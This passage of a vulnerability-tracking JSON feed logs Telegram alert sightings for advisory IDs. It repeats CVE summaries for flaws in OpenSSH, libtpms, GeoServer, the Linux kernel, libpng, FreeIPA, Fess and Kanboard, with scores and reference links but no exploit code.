https://access.redhat.com/errata/RHSA-2024:4910\n5. https://access.redhat.com/errata/RHSA-2024:4955\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5444\n8. https://access.redhat.com/security/cve/CVE-2024-6409\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2295085", "creation_timestamp": "2025-05-22T19:46:06.000000Z"}, {"uuid": "4c01407c-50c7-4d2b-af1a-2126a91a748d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4955", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17351", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-6409\n\ud83d\udd25 CVSS Score: 7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H)\n\ud83d\udd39 Description: A race condition vulnerability was discovered in how signals are handled by OpenSSH's server (sshd). If a remote attacker does not authenticate within a set time period, then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog(). As a consequence of a successful attack, in the worst case scenario, an attacker may be able to perform a remote code execution (RCE) as an unprivileged user running the sshd server.\n\ud83d\udccf Published: 2024-07-08T17:57:10.517Z\n\ud83d\udccf Modified: 2025-05-22T19:17:16.728Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4457\n2. https://access.redhat.com/errata/RHSA-2024:4613\n3. https://access.redhat.com/errata/RHSA-2024:4716\n4. https://access.redhat.com/errata/RHSA-2024:4910\n5. https://access.redhat.com/errata/RHSA-2024:4955\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5444\n8. https://access.redhat.com/security/cve/CVE-2024-6409\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2295085", "creation_timestamp": "2025-05-22T19:46:06.000000Z"}, {"uuid": "21295ceb-5534-4c86-b445-f9961d108e23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4910", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17351", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-6409\n\ud83d\udd25 CVSS Score: 7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H)\n\ud83d\udd39 Description: A race condition vulnerability was discovered in how signals are handled by OpenSSH's server (sshd). If a remote attacker does not authenticate within a set time period, then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog(). As a consequence of a successful attack, in the worst case scenario, an attacker may be able to perform a remote code execution (RCE) as an unprivileged user running the sshd server.\n\ud83d\udccf Published: 2024-07-08T17:57:10.517Z\n\ud83d\udccf Modified: 2025-05-22T19:17:16.728Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4457\n2. https://access.redhat.com/errata/RHSA-2024:4613\n3. https://access.redhat.com/errata/RHSA-2024:4716\n4. https://access.redhat.com/errata/RHSA-2024:4910\n5. https://access.redhat.com/errata/RHSA-2024:4955\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5444\n8. https://access.redhat.com/security/cve/CVE-2024-6409\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2295085", "creation_timestamp": "2025-05-22T19:46:06.000000Z"}, {"uuid": "0fc808fd-e708-490d-a3ac-7dfcdb3c5e06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4457", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17351", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-6409\n\ud83d\udd25 CVSS Score: 7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H)\n\ud83d\udd39 Description: A race condition vulnerability was discovered in how signals are handled by OpenSSH's server (sshd). If a remote attacker does not authenticate within a set time period, then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog(). As a consequence of a successful attack, in the worst case scenario, an attacker may be able to perform a remote code execution (RCE) as an unprivileged user running the sshd server.\n\ud83d\udccf Published: 2024-07-08T17:57:10.517Z\n\ud83d\udccf Modified: 2025-05-22T19:17:16.728Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4457\n2. https://access.redhat.com/errata/RHSA-2024:4613\n3. https://access.redhat.com/errata/RHSA-2024:4716\n4. https://access.redhat.com/errata/RHSA-2024:4910\n5. https://access.redhat.com/errata/RHSA-2024:4955\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5444\n8. https://access.redhat.com/security/cve/CVE-2024-6409\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2295085", "creation_timestamp": "2025-05-22T19:46:06.000000Z"}, {"uuid": "ddef76a9-89a9-4c4d-8cd9-529ec00bc7b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4960", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17351", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-6409\n\ud83d\udd25 CVSS Score: 7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H)\n\ud83d\udd39 Description: A race condition vulnerability was discovered in how signals are handled by OpenSSH's server (sshd). If a remote attacker does not authenticate within a set time period, then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog(). As a consequence of a successful attack, in the worst case scenario, an attacker may be able to perform a remote code execution (RCE) as an unprivileged user running the sshd server.\n\ud83d\udccf Published: 2024-07-08T17:57:10.517Z\n\ud83d\udccf Modified: 2025-05-22T19:17:16.728Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4457\n2. https://access.redhat.com/errata/RHSA-2024:4613\n3. https://access.redhat.com/errata/RHSA-2024:4716\n4. https://access.redhat.com/errata/RHSA-2024:4910\n5. https://access.redhat.com/errata/RHSA-2024:4955\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5444\n8. https://access.redhat.com/security/cve/CVE-2024-6409\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2295085", "creation_timestamp": "2025-05-22T19:46:06.000000Z"}, {"uuid": "4200e421-0225-4bd7-b949-526fc0556e9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M758-WJHJ-P3JQ", "type": "published-proof-of-concept", "source": "Telegram/lEx4szWN0qGJp6nrTUnjGPs2FeG4zgfzAhM3YBb6L1MKYlY", "content": "", "creation_timestamp": "2026-04-20T19:17:56.000000Z"}, {"uuid": "3616dc84-984b-41e4-9e1e-724a00bb662d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4613", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17351", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-6409\n\ud83d\udd25 CVSS Score: 7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H)\n\ud83d\udd39 Description: A race condition vulnerability was discovered in how signals are handled by OpenSSH's server (sshd). If a remote attacker does not authenticate within a set time period, then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog(). As a consequence of a successful attack, in the worst case scenario, an attacker may be able to perform a remote code execution (RCE) as an unprivileged user running the sshd server.\n\ud83d\udccf Published: 2024-07-08T17:57:10.517Z\n\ud83d\udccf Modified: 2025-05-22T19:17:16.728Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4457\n2. https://access.redhat.com/errata/RHSA-2024:4613\n3. https://access.redhat.com/errata/RHSA-2024:4716\n4. https://access.redhat.com/errata/RHSA-2024:4910\n5. https://access.redhat.com/errata/RHSA-2024:4955\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5444\n8. https://access.redhat.com/security/cve/CVE-2024-6409\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2295085", "creation_timestamp": "2025-05-22T19:46:06.000000Z"}, {"uuid": "378a8d19-0210-41a6-a2b1-2e426ebac246", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:5444", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17351", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-6409\n\ud83d\udd25 CVSS Score: 7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H)\n\ud83d\udd39 Description: A race condition vulnerability was discovered in how signals are handled by OpenSSH's server (sshd). If a remote attacker does not authenticate within a set time period, then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog(). As a consequence of a successful attack, in the worst case scenario, an attacker may be able to perform a remote code execution (RCE) as an unprivileged user running the sshd server.\n\ud83d\udccf Published: 2024-07-08T17:57:10.517Z\n\ud83d\udccf Modified: 2025-05-22T19:17:16.728Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4457\n2. https://access.redhat.com/errata/RHSA-2024:4613\n3. https://access.redhat.com/errata/RHSA-2024:4716\n4. https://access.redhat.com/errata/RHSA-2024:4910\n5. https://access.redhat.com/errata/RHSA-2024:4955\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5444\n8. https://access.redhat.com/security/cve/CVE-2024-6409\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2295085", "creation_timestamp": "2025-05-22T19:46:06.000000Z"}, {"uuid": "c9070e1f-2e47-46fd-8ac1-b8a2da2cafb0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-25W5-6FJJ-HF8G", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17994", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49133\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: Libtpms is a library that targets the integration of TPM functionality into hypervisors, primarily into Qemu. Libtpms, which is derived from the TPM 2.0 reference implementation code published by the Trusted Computing Group, is prone to a potential out of bounds (OOB) read vulnerability. The vulnerability occurs in the \u2018CryptHmacSign\u2019 function with an inconsistent pairing of the signKey and signScheme parameters, where the signKey is ALG_KEYEDHASH key and inScheme is an ECC or RSA scheme. The reported vulnerability is in the \u2018CryptHmacSign\u2019 function, which is defined in the \"Part 4: Supporting Routines \u2013 Code\" document, section \"7.151 - /tpm/src/crypt/CryptUtil.c \". This vulnerability can be triggered from user-mode applications by sending malicious commands to a TPM 2.0/vTPM (swtpm) whose firmware is based on an affected TCG reference implementation. The effect on libtpms is that it will cause an abort due to the detection of the out-of-bounds access, thus for example making a vTPM (swtpm) unavailable to a VM. This vulnerability is fixed in 0.7.12, 0.8.10, 0.9.7, and 0.10.1.\n\ud83d\udccf Published: 2025-06-10T19:46:27.397Z\n\ud83d\udccf Modified: 2025-06-10T20:01:40.310Z\n\ud83d\udd17 References:\n1. https://github.com/stefanberger/libtpms/security/advisories/GHSA-25w5-6fjj-hf8g\n2. https://github.com/stefanberger/libtpms/commit/04b2d8e9afc0a9b6bffe562a23e58c0de11532d1\n3. https://trustedcomputinggroup.org/resource/tpm-library-specification\n4. https://trustedcomputinggroup.org/wp-content/uploads/TPM-2.0-1.83-Part-4-Supporting-Routines-Code.pdf", "creation_timestamp": "2025-06-10T20:31:55.000000Z"}, {"uuid": "97d9ff77-be28-47a7-a756-ad5c4cd8a56c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GR67-PWCV-76GF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17911", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30145\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: GeoServer is an open source server that allows users to share and edit geospatial data. Malicious Jiffle scripts can be executed by GeoServer, either as a rendering transformation in WMS dynamic styles or as a WPS process, that can enter an infinite loop to trigger denial of service. This vulnerability is fixed in 2.27.0, 2.26.3, and 2.25.7. This vulnerability can be mitigated by disabling WMS dynamic styling and  the Jiffle process.\n\ud83d\udccf Published: 2025-06-10T14:58:48.408Z\n\ud83d\udccf Modified: 2025-06-10T15:16:31.100Z\n\ud83d\udd17 References:\n1. https://github.com/geoserver/geoserver/security/advisories/GHSA-gr67-pwcv-76gf\n2. https://github.com/geosolutions-it/jai-ext/pull/307\n3. https://osgeo-org.atlassian.net/browse/GEOS-11778", "creation_timestamp": "2025-06-10T15:31:13.000000Z"}, {"uuid": "be9190a1-e8be-4048-9e6e-1f2b1b182586", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2950", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17890", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6121\n\ud83d\udd25 CVSS Score: 4.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in the NVMe-oF/TCP subsystem in the Linux kernel. This issue may allow a remote attacker to send a crafted TCP packet, triggering a heap-based buffer overflow that results in kmalloc data being printed and potentially leaked to the kernel ring buffer (dmesg).\n\ud83d\udccf Published: 2023-11-16T14:45:38.430Z\n\ud83d\udccf Modified: 2025-06-10T13:58:09.509Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:2394\n2. https://access.redhat.com/errata/RHSA-2024:2950\n3. https://access.redhat.com/errata/RHSA-2024:3138\n4. https://access.redhat.com/security/cve/CVE-2023-6121\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2250043", "creation_timestamp": "2025-06-10T14:30:32.000000Z"}, {"uuid": "e31195c6-381f-455c-9e60-362ab8bfa190", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2014:0413", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17877", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2013-6954\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: The png_do_expand_palette function in libpng before 1.6.8 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via (1) a PLTE chunk of zero bytes or (2) a NULL palette, related to pngrtran.c and pngset.c.\n\ud83d\udccf Published: 2014-01-12T15:00:00.000Z\n\ud83d\udccf Modified: 2025-06-10T13:18:13.099Z\n\ud83d\udd17 References:\n1. https://www.ibm.com/support/docview.wss?uid=swg21675973\n2. https://access.redhat.com/errata/RHSA-2014:0414\n3. http://security.gentoo.org/glsa/glsa-201406-32.xml\n4. http://advisories.mageia.org/MGASA-2014-0075.html\n5. http://lists.fedoraproject.org/pipermail/package-announce/2014-February/128098.html\n6. http://lists.opensuse.org/opensuse-updates/2014-01/msg00071.html\n7. http://marc.info/?l=bugtraq&amp;m=140852886808946&amp;w=2\n8. http://www-01.ibm.com/support/docview.wss?uid=swg21672080\n9. http://sourceforge.net/p/libpng/code/ci/1faa6ff32c648acfe3cf30a58d31d7aebc24968c\n10. http://www.kb.cert.org/vuls/id/650142\n11. https://access.redhat.com/errata/RHSA-2014:0413\n12. http://secunia.com/advisories/59058\n13. http://marc.info/?l=bugtraq&amp;m=140852886808946&amp;w=2\n14. http://marc.info/?l=bugtraq&amp;m=140852974709252&amp;w=2\n15. http://www.securityfocus.com/bid/64493\n16. http://secunia.com/advisories/58974\n17. http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html\n18. https://bugzilla.redhat.com/show_bug.cgi?id=1045561\n19. http://www.mandriva.com/security/advisories?name=MDVSA-2014:035\n20. http://lists.fedoraproject.org/pipermail/package-announce/2014-February/127947.html\n21. http://marc.info/?l=bugtraq&amp;m=140852974709252&amp;w=2\n22. http://www-01.ibm.com/support/docview.wss?uid=swg21676746\n23. http://lists.fedoraproject.org/pipermail/package-announce/2014-February/128099.html\n24. http://lists.fedoraproject.org/pipermail/package-announce/2014-February/127952.html\n25. http://www.libpng.org/pub/png/libpng.html\n26. http://lists.fedoraproject.org/pipermail/package-announce/2014-February/128114.html\n27. http://sourceforge.net/projects/libpng/files/libpng16/1.6.8/", "creation_timestamp": "2025-06-10T13:30:03.000000Z"}, {"uuid": "e6a413b6-36c4-4730-a3b1-fcdbe4daef9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9PRC-PP2C-3427", "type": "seen", "source": "Telegram/QlBPoNymR9hPCPyX2NtJM9uRRriKED-kqAlb1qrMP0xHygk", "content": "", "creation_timestamp": "2026-04-21T03:18:04.000000Z"}, {"uuid": "888ebfda-3217-4958-9c10-f9ae9d337d21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7GCJ-PHFF-2884", "type": "seen", "source": "Telegram/QlBPoNymR9hPCPyX2NtJM9uRRriKED-kqAlb1qrMP0xHygk", "content": "", "creation_timestamp": "2026-04-21T03:18:04.000000Z"}, {"uuid": "a118b52b-6246-4547-b528-cffa976f3e3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HQ9P-PM7W-8P54", "type": "seen", "source": "Telegram/nn4r48_fMtsoF4yprR5SnwOJcbR44UlHSPFU-GpYRsWktOw", "content": "", "creation_timestamp": "2025-06-11T20:15:58.000000Z"}, {"uuid": "dda8968b-8108-43ba-9b71-9f0101791d6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5JW5-Q9J7-4RXC", "type": "published-proof-of-concept", "source": "Telegram/Dp3cHxEcbabtcr78eMwYzIZdIkaK3NXYlVFRQJBCFObozHI", "content": "", "creation_timestamp": "2026-04-21T17:18:19.000000Z"}, {"uuid": "8d33fd44-1532-4ac4-a524-c3e3f722242b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M8MH-X359-VM8M", "type": "seen", "source": "Telegram/y8A40ypWR-zTQL04UvuWU-fhawBkUz4Q7ssav8OQJXhA_oc", "content": "", "creation_timestamp": "2026-04-21T03:18:08.000000Z"}, {"uuid": "51ea48f0-3a3e-4d2b-9e60-9e688447a6b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2783-WXMM-WMWR", "type": "seen", "source": "Telegram/y8A40ypWR-zTQL04UvuWU-fhawBkUz4Q7ssav8OQJXhA_oc", "content": "", "creation_timestamp": "2026-04-21T03:18:08.000000Z"}, {"uuid": "901ae624-73b9-442a-bfc7-dabd2915fbd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J526-66F6-FXHX", "type": "seen", "source": "Telegram/y8A40ypWR-zTQL04UvuWU-fhawBkUz4Q7ssav8OQJXhA_oc", "content": "", "creation_timestamp": "2026-04-21T03:18:08.000000Z"}, {"uuid": "b07087dd-d440-4c10-a934-c4430b48c254", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RC47-H83G-2R8J", "type": "seen", "source": "Telegram/nn4r48_fMtsoF4yprR5SnwOJcbR44UlHSPFU-GpYRsWktOw", "content": "", "creation_timestamp": "2025-06-11T20:15:58.000000Z"}, {"uuid": "6b9e0386-87ef-4182-a75a-c2f734f6fb4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2394", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17890", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6121\n\ud83d\udd25 CVSS Score: 4.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in the NVMe-oF/TCP subsystem in the Linux kernel. This issue may allow a remote attacker to send a crafted TCP packet, triggering a heap-based buffer overflow that results in kmalloc data being printed and potentially leaked to the kernel ring buffer (dmesg).\n\ud83d\udccf Published: 2023-11-16T14:45:38.430Z\n\ud83d\udccf Modified: 2025-06-10T13:58:09.509Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:2394\n2. https://access.redhat.com/errata/RHSA-2024:2950\n3. https://access.redhat.com/errata/RHSA-2024:3138\n4. https://access.redhat.com/security/cve/CVE-2023-6121\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2250043", "creation_timestamp": "2025-06-10T14:30:32.000000Z"}, {"uuid": "812177be-9b0c-4762-84de-9f3e57edfb38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:3138", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17890", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6121\n\ud83d\udd25 CVSS Score: 4.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in the NVMe-oF/TCP subsystem in the Linux kernel. This issue may allow a remote attacker to send a crafted TCP packet, triggering a heap-based buffer overflow that results in kmalloc data being printed and potentially leaked to the kernel ring buffer (dmesg).\n\ud83d\udccf Published: 2023-11-16T14:45:38.430Z\n\ud83d\udccf Modified: 2025-06-10T13:58:09.509Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:2394\n2. https://access.redhat.com/errata/RHSA-2024:2950\n3. https://access.redhat.com/errata/RHSA-2024:3138\n4. https://access.redhat.com/security/cve/CVE-2023-6121\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2250043", "creation_timestamp": "2025-06-10T14:30:32.000000Z"}, {"uuid": "f13a643d-f5c6-42b2-acea-76583d7abda1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M5QW-23X2-6PHJ", "type": "seen", "source": "Telegram/y8A40ypWR-zTQL04UvuWU-fhawBkUz4Q7ssav8OQJXhA_oc", "content": "", "creation_timestamp": "2026-04-21T03:18:08.000000Z"}, {"uuid": "0ff54d11-323f-4469-aabe-9b800ad907d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9187", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18594", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-4404\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A privilege escalation from host to domain vulnerability was found in the FreeIPA project. The FreeIPA package fails to validate the uniqueness of the `krbCanonicalName` for the admin account by default, allowing users to create services with the same canonical name as the REALM admin. When a successful attack happens, the user can retrieve a Kerberos ticket in the name of this service, containing the admin@REALM credential. This flaw allows an attacker to perform administrative tasks over the REALM, leading to access to sensitive data and sensitive data exfiltration.\n\ud83d\udccf Published: 2025-06-17T13:39:17.945Z\n\ud83d\udccf Modified: 2025-06-17T14:30:18.658Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9185\n2. https://access.redhat.com/errata/RHSA-2025:9187\n3. https://access.redhat.com/errata/RHSA-2025:9189\n4. https://access.redhat.com/errata/RHSA-2025:9193\n5. https://access.redhat.com/errata/RHSA-2025:9194\n6. https://access.redhat.com/security/cve/CVE-2025-4404\n7. https://bugzilla.redhat.com/show_bug.cgi?id=2364606", "creation_timestamp": "2025-06-17T14:39:59.000000Z"}, {"uuid": "ca1663fb-0b81-4467-b5d9-d25a66da9bc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G88V-2J67-9RMX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17602", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48382\n\ud83d\udd25 CVSS Score: 1.2 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: Fess is a deployable Enterprise Search Server. Prior to version 14.19.2, the createTempFile() method in org.codelibs.fess.helper.SystemHelper creates temporary files without explicitly setting restrictive permissions. This could lead to potential information disclosure, allowing unauthorized local users to access sensitive data contained in these files. This issue primarily affects environments where Fess is deployed in a shared or multi-user context. Typical single-user or isolated deployments have minimal or negligible practical impact. This issue has been patched in version 14.19.2. A workaround for this issue involves ensuring local access to the environment running Fess is restricted to trusted users only.\n\ud83d\udccf Published: 2025-05-27T04:32:23.804Z\n\ud83d\udccf Modified: 2025-05-27T04:32:23.804Z\n\ud83d\udd17 References:\n1. https://github.com/codelibs/fess/security/advisories/GHSA-g88v-2j67-9rmx\n2. https://github.com/codelibs/fess/commit/25b2009fea2a0f6ccd5aa8154aa54b536c08f6c4", "creation_timestamp": "2025-05-27T04:47:50.000000Z"}, {"uuid": "895b2ec5-d45f-4c8c-979b-b127864840c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FH99-WR77-PXQ3", "type": "published-proof-of-concept", "source": "Telegram/1Pb-KptaOS8jtUqbqEGgMTqxd6XnuqAfoWvymUwYUnm4klk", "content": "", "creation_timestamp": "2026-04-21T05:15:20.000000Z"}, {"uuid": "6cb49781-9fa1-4163-a931-895848e73a8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2CH5-GQJM-8P92", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19300", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52560\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: Kanboard is project management software that focuses on the Kanban methodology. Prior to version 1.2.46, Kanboard allows password reset emails to be sent with URLs derived from the unvalidated Host header when the application_url configuration is unset (default behavior). This allows an attacker to craft a malicious password reset link that leaks the token to an attacker-controlled domain. If a victim (including an administrator) clicks the poisoned link, their account can be taken over. This affects all users who initiate a password reset while application_url is not set. This issue has been 